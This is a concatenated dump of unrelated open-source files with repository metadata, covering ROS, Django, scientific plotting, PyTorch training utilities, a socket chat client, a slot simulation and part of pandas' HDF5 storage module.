"[email protected]"
] | |
828e05d68fa7676fef57ac1f7c5ee4227f6f8f37
|
3ba03246e8ddf25b4f7607d072efad7dfdeb7a85
|
/cbf_control/src/main.py
|
59213d3470510c8c3ce432c023ab31f43e3a16c0
|
[] |
no_license
|
Jaroan/PR2_CBF
|
c1961c928547cd685e8c7c46452c6c2639764dce
|
22b644d1462363bf3594cfe22e6069f22f9931e1
|
refs/heads/master
| 2021-10-08T16:57:03.671254 | 2018-12-15T04:01:31 | 2018-12-15T04:01:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,032 |
py
|
import rospy
from std_msgs.msg import Float32MultiArray, MultiArrayDimension
import time
from optimizer import Optimizer
def forward_kinematics_func(q):
gfk = GetFK('l_wrist_roll_link', 'base_link')
resp = gfk.get_current_fk(q)
def publisher():
rospy.init_node('trajectory')
pub = rospy.Publisher('trajectory', Float32MultiArray, queue_size=1)
rate = rospy.Rate(100)
num_points = 2
t = Float32MultiArray()
t.layout.dim.append(MultiArrayDimension(
size=num_points, stride=num_points*7, label="points"))
t.layout.dim.append(MultiArrayDimension(size=7, stride=7, label="joints"))
t.layout.data_offset = 0
t.data = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
-0.7853981633974483, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
print(t)
# while not rospy.is_shutdown():
# pub.publish(t)
# rate.sleep()
time.sleep(3)
pub.publish(t)
if __name__ == '__main__':
try:
publisher()
except rospy.ROSInterruptException:
pass
|
[
"[email protected]"
] | |
cebb283734b02844e2039ccc368112a270cb896b
|
c39e466c2b6fdffbc410f24669f214e13fb87781
|
/PYTHON/TEMA 4/Unit4_examples/Unit4_Functions_example1.py
|
61c8f70816785dcaa93e7f65f5fccf3266b2d112
|
[] |
no_license
|
enanibus/biopython
|
3a58efbcc92f1ce60285a115c620de9295b7d281
|
613d334a5c0502059930d9381a9464ef533cca1c
|
refs/heads/master
| 2021-01-12T17:27:39.516793 | 2017-01-02T18:30:09 | 2017-01-02T18:30:09 | 71,573,732 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 256 |
py
|
def Media (NumberList):
suma=0
for n in NumberList:
suma=suma+n
result=suma/len(NumberList)
return(result)
Weight4Bq=[70,47,68,56,87,49,48,71,65,62]
AverageWeight4Bq=Media(Weight4Bq)
print(AverageWeight4Bq)
|
[
"[email protected]"
] | |
9222ee7ff2fb1829be3106e311fbfe64e0ed86d0
|
96b4b1339e745fe15d898f301a65a002898d7a70
|
/Project4/alt_solns/Final/prob1_sim.py
|
442a9b5c20ac3a839a9ce36852de8c5ff993d629
|
[] |
no_license
|
abusa1101/AI-coding-problems
|
8ace849ec236a059278d684bba644471f99d1979
|
d4bfa45ddc2fa1aecbf15161fcea4cb92db8dec1
|
refs/heads/master
| 2023-08-25T19:28:56.851217 | 2021-10-06T20:39:51 | 2021-10-06T20:39:51 | 235,749,527 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,318 |
py
|
import random as rd
def simulate_slots():
play_num = 0
balance = 10
cherry_payback = 0
while balance:
balance -= 1
play_num += 1
symbols = ["bar", "bell", "lemon", "cherry", "blank", "blank", "blank", "blank"]
wheels = []
for i in range(3):
wheels.append(rd.choice(symbols))
if wheels[0] == "cherry":
if wheels[0] == wheels[1]:
if wheels[1] == wheels[2]:
cherry_payback = 3
else:
cherry_payback = 2
else:
cherry_payback = 1
balance += cherry_payback
elif wheels[0] == wheels[1] and wheels[1] == wheels[2]:
if wheels[0] == "bar":
balance += 20
elif wheels[0] == "bell":
balance += 15
elif wheels[0] == "lemon":
balance += 5
else:
balance += 0
return play_num
TRIES = 10000
VAL = []
for x in range(TRIES):
VAL.append(simulate_slots())
MEAN = sum(VAL) / float(TRIES)
N = len(VAL)
VAL.sort()
if N % 2 == 0:
MEDIAN1 = VAL[N//2]
MEDIAN2 = VAL[N//2 - 1]
MEDIAN = (MEDIAN1 + MEDIAN2)/2
else:
MEDIAN = VAL[N//2]
print("Tries, Mean, Median: %s, %s, %s" % (TRIES, MEAN, MEDIAN))
|
[
"[email protected]"
] | |
7455a9c2dc2c361c1d554d1309ffd459284caa46
|
fb3ff12389925480a19b11e6bb51ea760b7af729
|
/chat2.py
|
23914506991017343a3779cb057d01b0ca95d14a
|
[] |
no_license
|
sd8917/web_project
|
60a353a2bc24600a183a9653765612c5809e9634
|
18228db4980aa7733f2d668d1cb8201df13ec493
|
refs/heads/master
| 2020-03-31T20:53:06.384469 | 2018-10-11T09:09:12 | 2018-10-11T09:09:12 | 152,559,275 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 262 |
py
|
import socket
s = socket.socket()
host = socket .gethostname()
port = 12345
s.connect((host,port))
while True:
data = str(s.recv(1024)).strip('b').strip('\'')
print(data)
messg = bytes("sudhanshu : " + input(r""),encoding='utf-8')
s.send(messg)
|
[
"[email protected]"
] | |
8743f7c223895996eeda93730b3d1d86d7246f5b
|
e0feac125fb92c3d1834f9c9c89baf4ab9428fc6
|
/steamshovel/python/artists/util.py
|
e2aeaf201e5848791815adc40ec69406a701c41d
|
[
"BSD-2-Clause"
] |
permissive
|
AlexHarn/bfrv1_icetray
|
e6b04d04694376488cec93bb4b2d649734ae8344
|
91f939afecf4a9297999b022cea807dea407abe9
|
refs/heads/master
| 2022-12-04T13:35:02.495569 | 2020-08-27T22:14:40 | 2020-08-27T22:14:40 | 275,841,407 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 12,732 |
py
|
import math
import re
from icecube.shovelart import Vec3dList, vec3d
from icecube import dataclasses
from icecube import icetray
I3Units = icetray.I3Units
# imports may not fail, since util is used by everybody
try: import numpy as np
except ImportError: pass
try:
from matplotlib import patches as mpatches
from matplotlib import transforms as mtransforms
except ImportError:
pass
# CamelCase because it behaves like a class
def TankPositionGenerator(geometry):
"""
Returns the OMKeys and positions of IceTop tanks.
"""
# for omkey, geo in geometry.omgeo:
# if 60 < omkey.om < 65:
# yield omkey, geo.position
for station in geometry.stationgeo.values():
for tank in station:
yield tank.omkey_list[0], tank.position
yield tank.omkey_list[1], tank.position
def parse_engineering( string, unit = "" ):
"""
Parses a string in engineering notation (k,M,m,...).
:param string: string to parse
:param unit: unit to expect, if it is not there, raise ValueError
:returns: parsed float
Use u for micro. We cannot parse the mu sign since
we are limited to ASCII.
"""
if not string.endswith(unit):
raise ValueError("string '%s' is missing the unit '%s'" % (string, unit))
if unit:
string = string[:-len(unit)]
m = re.match(r"\s*([\+\-]?[.0-9]+)\s*([a-zA-Z]*)\s*", string)
if not m:
raise ValueError("string '%s' cannot be parsed" % string)
x = m.group(1)
mod = m.group(2)
conv = {'a':1e-18, 'f':1e-15, 'p':1e-12, 'n':1e-9, 'u':1e-6,
'm':1e-3 , 'c':1e-2 , 'd':1e-1 , '':1.0 , 'k':1e3 ,
'M':1e6 , 'G':1e9 , 'T':1e12 , 'P':1e15, 'E':1e18}
return float(x) * conv[mod]
def format_engineering( number, unit = "" ):
"""
Writes a string in engineering notation (k,M,m,...).
:param number: number to format
:param unit: optional unit string to append
:returns: formatted string
Should be the inverse of parse_engineering(...).
"""
if math.isnan(number):
return "nan"
if number == 0.0:
return 0
convert_table = {-18:'a', -15:'f', -12:'p', -9:'n', -6:'u',
-3:'m', -2:'c', -1:'d', 0:'', 3:'k',
6:'M', 9:'G', 12:'T', 15:'P', 18:'E'}
l10 = math.log10(abs(number))
ten_exp = int(l10)
sci_places = int(ten_exp / 3) * 3
sci_signific = (ten_exp % 3)
expo_char = convert_table[sci_places]
trailing = number / 10.0 ** sci_places
# print z, ten_exp, sci_places, sci_signific
if trailing >= 10:
lead = "{:d}".format(int(round(trailing)))
elif trailing >= 1:
lead = "{:.1f}".format(trailing)
else:
lead = "{:.2f}".format(trailing)
return lead + " " + expo_char + unit
def detector_outline( bottom_vec3d_list, top_vec3d_list ):
"""
Returns detector outline by detecting points at the border.
Only works for standard hexagon grid.
"""
# hardcoded angular offset for hexagon
phi0 = -20.0 * I3Units.degree
# hardcoded threshold for an edge
cos_angle_threshold = math.cos( 7.0 * I3Units.degree )
bottom = Vec3dList()
top = Vec3dList()
string_coords = []
for b, t in zip( bottom_vec3d_list, top_vec3d_list ):
if t[2] < 450.0 * I3Units.meter: # ignore deep-core
continue
string_coords.append(( math.atan2(t[1], t[0]),
t[0], t[1], b[2], t[2] ))
# border detection:
# check if there is a point in each angular segment of hexagon
border = []
for i, cur in enumerate( string_coords ):
counts = [False, False, False, False, False , False]
for j, other in enumerate( string_coords ):
if i == j: continue
dx = cur[1] - other[1]
dy = cur[2] - other[2]
phi = int((math.atan2( dy, dx ) - phi0) / I3Units.degree)
if phi < 0:
phi += 360
counts[phi // 60] = True
neighbor_count = sum( counts )
# border points don't have a full hexagon of neighbors
if neighbor_count < 6:
border.append( cur )
border.sort() # put in circular order
# edge detection:
# check if differential vectors of three consecutive points have an angle
for i in range( len(border) ):
ax = border[i - 1][1] - border[i - 2][1]
ay = border[i - 1][2] - border[i - 2][2]
bx = border[i][1] - border[i - 1][1]
by = border[i][2] - border[i - 1][2]
anorm = (ax ** 2 + ay ** 2) ** 0.5
bnorm = (bx ** 2 + by ** 2) ** 0.5
cos_angle = (bx * ax + by * ay) / (anorm * bnorm)
if cos_angle < cos_angle_threshold:
cur = border[i - 1]
bottom.append( vec3d(cur[1], cur[2], cur[3]) )
top.append( vec3d(cur[1], cur[2], cur[4]) )
return bottom, top
def particle_pos(particle, time):
"""
Returns the position of a particle at the given time.
"""
return particle.pos + particle.dir * particle.speed * (time - particle.time)
def to_shower_cs(i3direction):
"""
Returns rotation matrix to shower CS for given i3direction.
Requires numpy.
"""
cos = math.cos
sin = math.sin
phi = i3direction.phi
theta = i3direction.theta
cp = cos(phi)
sp = sin(phi)
ct = cos(theta)
st = sin(theta)
# counter-clockwise (pi + phi) rotation
d_phi = np.matrix([[-cp, -sp, 0],
[sp , -cp, 0],
[0 , 0, 1]])
# clock-wise (pi - theta) rotation
d_theta = np.matrix([[-ct, 0, -st],
[0 , 1, 0],
[st , 0, -ct]])
return d_theta * d_phi
def signed_r_z(rotation_matrix, positions, core):
"""
Returns signed lateral distance with r > 0 as early and r < 0 as late hits.
For the rotation matrix, use to_shower_cs(...).
Requires numpy.
"""
arr = np.array
pos = arr(positions) - core
rot_pos = arr(rotation_matrix * pos.T).T
x = rot_pos[:, 0].T
y = rot_pos[:, 1].T
z = rot_pos[:, 2].T
r = (x ** 2 + y ** 2) ** 0.5 * np.sign(-x)
return r, z
def propagate_covariance(f, x, cov):
"""
Computes the covariance matrix of y for the transformation y = f(x),
given x with covariance matrix cov.
Requires numpy.
:param f: function-like, has to be callable as f(x)
:param x: array-like, vector of parameters
:param cov: 2-d array of floats, covariance matrix of x
:returns: fcov: matrix of floats, covariance matrix of the output of f
Examples:
>>> import numpy as np
>>> v = np.ones(2)
>>> cov = np.ones((2,2))
>>> def f(r):return np.dot(r,r)
>>> "%.3g" % propagate_covariance(f,v,cov)
'16'
>>> def f(r):return 2*r
>>> propagate_covariance(f,v,cov)
array([[ 4., 4.],
[ 4., 4.]])
Authors:
Hans Dembinski <[email protected]>
"""
ncol = len(x)
diag = np.diag(cov)
dx = diag ** 0.5 * 1e-3
dx[diag == 0] = 1e-6
jacobi = jacobian(f, x, dx)
return np.dot(jacobi, np.dot(cov, jacobi.T))
def jacobian(f, x, dx):
"""
Numerically calculate matrix of first derivatives.
Needed for error propagation.
Requires numpy.
:param f: function-like, has to be callable as f(x)
:param x: array-like, vector of parameters
:param steps: array-like (optional), vector of deltas to use in numerical approximation
:returns: Jacobi matrix of first derivatives
Examples:
>>> def f(v): return 0.5*np.dot(v,v)
>>> jacobian(f,np.ones(2))
array([[ 1., 1.]])
>>> def f(v): return np.dot(v,v)*v
>>> jacobian(f,np.ones(2))
array([[ 4., 2.],
[ 2., 4.]])
Authors:
Hans Dembinski <[email protected]>
"""
x = np.atleast_1d(x)
dx = np.atleast_1d(dx)
nx = len(x)
ny = 0
jacobi = None
e = np.zeros(nx)
for ix in range(nx):
e *= 0
e[ix] = 1
deriv = np.atleast_1d((f(x + e * dx) - f(x - e * dx)) / (2 * dx[ix]))
if ix == 0:
ny = len(deriv)
jacobi = np.empty((ny, nx))
jacobi[:, ix] = deriv
return jacobi
def cornertext(text, loc=2, color=None, frameon=False,
axes=None, borderpad=None, borderaxespad=None, handletextpad=None,
**kwargs):
"""
Conveniently places text in a corner of an MPL plot. Mimics pyplot.legend(...).
Requires matplotlib.
:param text: string or tuple of strings
Text to be placed in the plot. May be a tuple of strings to get
several lines of text.
:param loc: integer or string
Location of text, same as in legend(...).
:param frameon: boolean (optional)
Whether to draw a border around the text. Default is False.
:param axes: Axes (optional, default: None)
Axes object which houses the text (defaults to the current axes).
Other keyword arguments are forwarded to the text instance.
Authors:
Hans Dembinski <[email protected]>
"""
from matplotlib.offsetbox import AnchoredOffsetbox, VPacker, TextArea
from matplotlib import rcParams
from matplotlib.font_manager import FontProperties
import warnings
if axes is None:
from matplotlib import pyplot as plt
axes = plt.gca()
locTranslate = {
'upper right': 1,
'upper left': 2,
'lower left': 3,
'lower right': 4,
'right': 5,
'center left': 6,
'center right': 7,
'lower center': 8,
'upper center': 9,
'center': 10
}
if isinstance(loc, str):
if loc in locTranslate:
loc = locTranslate[loc]
else:
message = ('Unrecognized location "%s". '
'Falling back on "upper left"; '
'valid locations are\n\t%s') \
% (loc, '\n\t'.join(locTranslate.keys()))
warnings.warn(message)
loc = 2
if borderpad is None:
borderpad = rcParams["legend.borderpad"]
if borderaxespad is None:
borderaxespad = rcParams["legend.borderaxespad"]
if handletextpad is None:
handletextpad = rcParams["legend.handletextpad"]
if "fontproperties" in kwargs:
fontproperties = kwargs["fontproperties"]
del kwargs["fontproperties"]
else:
if "size" in kwargs:
size = kwargs["size"]
del kwargs["size"]
elif "fontsize" in kwargs:
size = kwargs["fontsize"]
del kwargs["fontsize"]
else:
size = rcParams["legend.fontsize"]
fontproperties = FontProperties(size=size)
texts = [text] if isinstance(text, str) else text
colors = [color for t in texts] if (
isinstance(color, str) or color is None) else color
tas = []
for t, c in zip(texts, colors):
ta = TextArea(t,
textprops={"color": c,
"fontproperties": fontproperties},
multilinebaseline=True,
minimumdescent=True,
**kwargs)
tas.append(ta)
vpack = VPacker(children=tas, pad=0, sep=handletextpad)
aob = AnchoredOffsetbox(loc, child=vpack,
pad=borderpad,
borderpad=borderaxespad,
frameon=frameon)
axes.add_artist(aob)
return aob
def mpl_hist(x, y, **kwargs):
m = len(y)
n = 2 * m + 2
xy = np.zeros((n, 2))
xy[0][0] = x[0]
xy[-1][0] = x[-1]
for i in range(m):
xy[1 + 2 * i][0] = x[i]
xy[1 + 2 * i][1] = y[i]
xy[1 + 2 * i + 1][0] = x[i + 1]
xy[1 + 2 * i + 1][1] = y[i]
return mpatches.Polygon(xy, **kwargs)
def rainbow_text(axes, x, y, strings, colors, **kwargs):
"""
Draws a sequence of strings in various colors.
Based on http://stackoverflow.com/questions/9169052.
"""
fontweights = None
if "fontweights" in kwargs:
fontweights = kwargs["fontweights"]
del kwargs["fontweights"]
renderer = axes.figure.canvas.get_renderer()
for i, s in enumerate(strings):
kwargs["color"] = colors[i]
if fontweights is not None:
kwargs["fontweight"] = fontweights[i]
tx = axes.text(x, y, s, **kwargs)
tx.draw(renderer)
ex = tx.get_window_extent()
kwargs["transform"] = mtransforms.offset_copy(tx._transform,
x=ex.width,
units='dots')
|
[
"[email protected]"
] | |
c0554377c598e57e3369a03fa8b9b79338b3e0c2
|
c76779dd4682cdf252623a193d735a8893e872f2
|
/gs119/gs119/settings.py
|
457eec650ae398373a531687421cc1ce5ef40e84
|
[] |
no_license
|
sailendrachettri/learning-django
|
fef240aa19303d876f760a5641d9d15b2716b61b
|
3c413628f0f4a3a560fa5c56a5228260c50e0230
|
refs/heads/main
| 2023-03-28T22:18:24.620614 | 2021-04-10T11:04:40 | 2021-04-10T11:04:40 | 355,099,833 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,073 |
py
|
"""
Django settings for gs119 project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'mdulujvt3&wlt7s%xfwe!q1g&n+y8k)o(vqeygx3-ld0g-26k3'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'school',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'gs119.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'gs119.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
|
[
"[email protected]"
] | |
459a5c19a5b75157ec9aa8f5eef3223c4ec4fba3
|
a63e24d4d6521e98e1b79c2528ab6f08d5add66c
|
/kps2d_detection/hr_net/lib/utils/utils.py
|
9561baa3f456005004fd3a5a38d49dcc505e5f43
|
[
"MIT"
] |
permissive
|
abrichr/cvToolkit
|
7d3f2e593d3132aae8c519c024383b0f269eeda6
|
7f559138c27fedf9e3e3929cd4d6e4f8198d4c51
|
refs/heads/master
| 2022-07-19T00:45:52.036959 | 2020-05-26T06:02:24 | 2020-05-26T06:02:24 | 266,943,746 | 0 | 0 |
MIT
| 2020-05-26T04:24:25 | 2020-05-26T04:24:25 | null |
UTF-8
|
Python
| false | false | 7,023 |
py
|
# ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Bin Xiao ([email protected])
# ------------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import logging
import time
from collections import namedtuple
from pathlib import Path
import torch
import torch.optim as optim
import torch.nn as nn
def create_logger(cfg, cfg_name, phase='train'):
root_output_dir = Path(cfg.OUTPUT_DIR)
# set up logger
if not root_output_dir.exists():
print('=> creating {}'.format(root_output_dir))
root_output_dir.mkdir()
dataset = cfg.DATASET.DATASET + '_' + cfg.DATASET.HYBRID_JOINTS_TYPE \
if cfg.DATASET.HYBRID_JOINTS_TYPE else cfg.DATASET.DATASET
dataset = dataset.replace(':', '_')
model = cfg.MODEL.NAME
cfg_name = os.path.basename(cfg_name).split('.')[0]
final_output_dir = root_output_dir / dataset / model / cfg_name
print('=> creating {}'.format(final_output_dir))
final_output_dir.mkdir(parents=True, exist_ok=True)
time_str = time.strftime('%Y-%m-%d-%H-%M')
log_file = '{}_{}_{}.log'.format(cfg_name, time_str, phase)
final_log_file = final_output_dir / log_file
head = '%(asctime)-15s %(message)s'
logging.basicConfig(filename=str(final_log_file),
format=head)
logger = logging.getLogger()
logger.setLevel(logging.INFO)
console = logging.StreamHandler()
logging.getLogger('').addHandler(console)
tensorboard_log_dir = Path(cfg.LOG_DIR) / dataset / model / \
(cfg_name + '_' + time_str)
print('=> creating {}'.format(tensorboard_log_dir))
tensorboard_log_dir.mkdir(parents=True, exist_ok=True)
return logger, str(final_output_dir), str(tensorboard_log_dir)
def get_optimizer(cfg, model):
optimizer = None
if cfg.TRAIN.OPTIMIZER == 'sgd':
optimizer = optim.SGD(
model.parameters(),
lr=cfg.TRAIN.LR,
momentum=cfg.TRAIN.MOMENTUM,
weight_decay=cfg.TRAIN.WD,
nesterov=cfg.TRAIN.NESTEROV
)
elif cfg.TRAIN.OPTIMIZER == 'adam':
optimizer = optim.Adam(
model.parameters(),
lr=cfg.TRAIN.LR
)
return optimizer
def save_checkpoint(states, is_best, output_dir,
filename='checkpoint.pth'):
torch.save(states, os.path.join(output_dir, filename))
if is_best and 'state_dict' in states:
torch.save(states['best_state_dict'],
os.path.join(output_dir, 'model_best.pth'))
def get_model_summary(model, *input_tensors, item_length=26, verbose=False):
"""
:param model:
:param input_tensors:
:param item_length:
:return:
"""
summary = []
ModuleDetails = namedtuple(
"Layer", ["name", "input_size", "output_size", "num_parameters", "multiply_adds"])
hooks = []
layer_instances = {}
def add_hooks(module):
def hook(module, input, output):
class_name = str(module.__class__.__name__)
instance_index = 1
if class_name not in layer_instances:
layer_instances[class_name] = instance_index
else:
instance_index = layer_instances[class_name] + 1
layer_instances[class_name] = instance_index
layer_name = class_name + "_" + str(instance_index)
params = 0
if class_name.find("Conv") != -1 or class_name.find("BatchNorm") != -1 or \
class_name.find("Linear") != -1:
for param_ in module.parameters():
params += param_.view(-1).size(0)
flops = "Not Available"
if class_name.find("Conv") != -1 and hasattr(module, "weight"):
flops = (
torch.prod(
torch.LongTensor(list(module.weight.data.size()))) *
torch.prod(
torch.LongTensor(list(output.size())[2:]))).item()
elif isinstance(module, nn.Linear):
flops = (torch.prod(torch.LongTensor(list(output.size()))) \
* input[0].size(1)).item()
if isinstance(input[0], list):
input = input[0]
if isinstance(output, list):
output = output[0]
summary.append(
ModuleDetails(
name=layer_name,
input_size=list(input[0].size()),
output_size=list(output.size()),
num_parameters=params,
multiply_adds=flops)
)
if not isinstance(module, nn.ModuleList) \
and not isinstance(module, nn.Sequential) \
and module != model:
hooks.append(module.register_forward_hook(hook))
model.apply(add_hooks)
space_len = item_length
model(*input_tensors)
for hook in hooks:
hook.remove()
details = ''
if verbose:
details = "Model Summary" + \
os.linesep + \
"Name{}Input Size{}Output Size{}Parameters{}Multiply Adds (Flops){}".format(
' ' * (space_len - len("Name")),
' ' * (space_len - len("Input Size")),
' ' * (space_len - len("Output Size")),
' ' * (space_len - len("Parameters")),
' ' * (space_len - len("Multiply Adds (Flops)"))) \
+ os.linesep + '-' * space_len * 5 + os.linesep
params_sum = 0
flops_sum = 0
for layer in summary:
params_sum += layer.num_parameters
if layer.multiply_adds != "Not Available":
flops_sum += layer.multiply_adds
if verbose:
details += "{}{}{}{}{}{}{}{}{}{}".format(
layer.name,
' ' * (space_len - len(layer.name)),
layer.input_size,
' ' * (space_len - len(str(layer.input_size))),
layer.output_size,
' ' * (space_len - len(str(layer.output_size))),
layer.num_parameters,
' ' * (space_len - len(str(layer.num_parameters))),
layer.multiply_adds,
' ' * (space_len - len(str(layer.multiply_adds)))) \
+ os.linesep + '-' * space_len * 5 + os.linesep
details += os.linesep \
+ "Total Parameters: {:,}".format(params_sum) \
+ os.linesep + '-' * space_len * 5 + os.linesep
details += "Total Multiply Adds (For Convolution and Linear Layers only): {:,} GFLOPs".format(flops_sum/(1024**3)) \
+ os.linesep + '-' * space_len * 5 + os.linesep
details += "Number of Layers" + os.linesep
for layer in layer_instances:
details += "{} : {} layers ".format(layer, layer_instances[layer])
return details
|
[
"[email protected]"
] | |
2954d8e87acd58471c0442c2ef128a0d55a74d62
|
e00d8b1b7fc1d6425de2fe4538e84ccb9ccda452
|
/itc/hebei_toll.py
|
18b358874da6553e9bb06dd7a2c23613e0dbd413
|
[] |
no_license
|
yiruiduan/2018-07
|
64ffcc8988330bfd912bdf7f44d32ca3889a81d3
|
36471f3458abb96462021e3588ed2ebf9abfc739
|
refs/heads/master
| 2021-07-10T19:19:28.322710 | 2019-01-08T06:00:44 | 2019-01-08T06:00:44 | 135,425,614 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 812 |
py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import xlwt
import re
workbook = xlwt.Workbook(encoding = 'ascii')
pattern = re.compile(u'[\u4e00-\u9fa5]+')
with open("河北北京天津收费站.txt","r",encoding="utf-8") as f:
for line in f:
if line.startswith("###"):
filterdata = re.findall(pattern, line)
worksheet = workbook.add_sheet(filterdata[0])
worksheet.write(0,1,label="所属高速")
worksheet.write(0, 2, label="高速名称")
i=1
if line.startswith("所属高速:"):
for j in range(3):
# print(j)
# print((line.strip().split(":")[j]))
worksheet.write(i,j,label=line.strip().split(":")[j])
i+=1
workbook.save("河北北京天津高速.xlsx")
|
[
"[email protected]"
] | |
30b9aecd5b9ce921e51813aabafbfb4ec0a9ce8f
|
759211e54accb3c8b1375dca1f2a6f4738e8c6c2
|
/pandas/io/pytables.py
|
38e6c30a3dbd3913ce73fefaf73ca4cb26e3a59c
|
[
"BSD-3-Clause"
] |
permissive
|
rkabir/pandas
|
fc92b88d171f34be35537027c0ec09c9c84225f5
|
877e5962f7d6b0e2444f108569c7d1264db5423f
|
refs/heads/master
| 2021-01-18T11:59:31.831230 | 2011-09-18T22:40:30 | 2011-09-18T22:40:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 27,689 |
py
|
"""
High level interface to PyTables for reading and writing pandas data structures
to disk
"""
# pylint: disable-msg=E1101,W0613,W0603
from datetime import datetime
import time
import numpy as np
from pandas import (Series, TimeSeries, DataFrame, Panel, LongPanel,
MultiIndex)
from pandas.core.common import adjoin
import pandas._tseries as _tseries
# reading and writing the full object in one go
_TYPE_MAP = {
Series : 'series',
TimeSeries : 'series',
DataFrame : 'frame',
Panel : 'wide',
LongPanel : 'long'
}
_NAME_MAP = {
'series' : 'Series',
'time_series' : 'TimeSeries',
'frame' : 'DataFrame',
'frame_table' : 'DataFrame (Table)',
'wide' : 'Panel',
'wide_table' : 'Panel (Table)',
'long' : 'LongPanel',
# legacy h5 files
'Series' : 'Series',
'TimeSeries' : 'TimeSeries',
'DataFrame' : 'DataFrame',
'DataMatrix' : 'DataMatrix'
}
# legacy handlers
_LEGACY_MAP = {
'Series' : 'legacy_series',
'TimeSeries' : 'legacy_series',
'DataFrame' : 'legacy_frame',
'DataMatrix' : 'legacy_frame'
}
# oh the troubles to reduce import time
_table_mod = None
def _tables():
global _table_mod
if _table_mod is None:
import tables
_table_mod = tables
return _table_mod
class HDFStore(object):
"""
dict-like IO interface for storing pandas objects in PyTables
format.
DataFrame and Panel can be stored in Table format, which is slower to
read and write but can be searched and manipulated more like an SQL
table. See HDFStore.put for more information
Parameters
----------
path : string
File path to HDF5 file
mode : {'a', 'w', 'r', 'r+'}, default 'a'
``'r'``
Read-only; no data can be modified.
``'w``'
Write; a new file is created (an existing file with the same
name would be deleted).
``'a'``
Append; an existing file is opened for reading and writing,
and if the file does not exist it is created.
``'r+'``
It is similar to ``'a'``, but the file must already exist.
complevel : int, 1-9, default 0
If a complib is specified compression will be applied
where possible
complib : {'zlib', 'bzip2', 'lzo', 'blosc', None}, default None
If complevel is > 0 apply compression to objects written
in the store wherever possible
fletcher32 : bool, default False
If applying compression use the fletcher32 checksum
Examples
--------
>>> store = HDFStore('test.h5')
>>> store['foo'] = bar # write to HDF5
>>> bar = store['foo'] # retrieve
>>> store.close()
"""
_quiet = False
def __init__(self, path, mode='a', complevel=None, complib=None,
fletcher32=False):
try:
import tables as _
except ImportError: # pragma: no cover
raise Exception('HDFStore requires PyTables')
self.path = path
self.mode = mode
self.handle = None
self.complevel = complevel
self.complib = complib
self.fletcher32 = fletcher32
self.filters = None
self.open(mode=mode, warn=False)
def __getitem__(self, key):
return self.get(key)
def __setitem__(self, key, value):
self.put(key, value)
def __len__(self):
return len(self.handle.root._v_children)
def __repr__(self):
output = '%s\nFile path: %s\n' % (type(self), self.path)
if len(self) > 0:
keys = []
values = []
for k, v in sorted(self.handle.root._v_children.iteritems()):
kind = v._v_attrs.pandas_type
keys.append(str(k))
values.append(_NAME_MAP[kind])
output += adjoin(5, keys, values)
else:
output += 'Empty'
return output
def open(self, mode='a', warn=True):
"""
Open the file in the specified mode
Parameters
----------
mode : {'a', 'w', 'r', 'r+'}, default 'a'
See HDFStore docstring or tables.openFile for info about modes
"""
self.mode = mode
if warn and mode == 'w': # pragma: no cover
while True:
response = raw_input("Re-opening as mode='w' will delete the "
"current file. Continue (y/n)?")
if response == 'y':
break
elif response == 'n':
return
if self.handle is not None and self.handle.isopen:
self.handle.close()
if self.complib is not None:
if self.complevel is None:
self.complevel = 9
self.filters = _tables().Filters(self.complevel,
self.complib,
fletcher32=self.fletcher32)
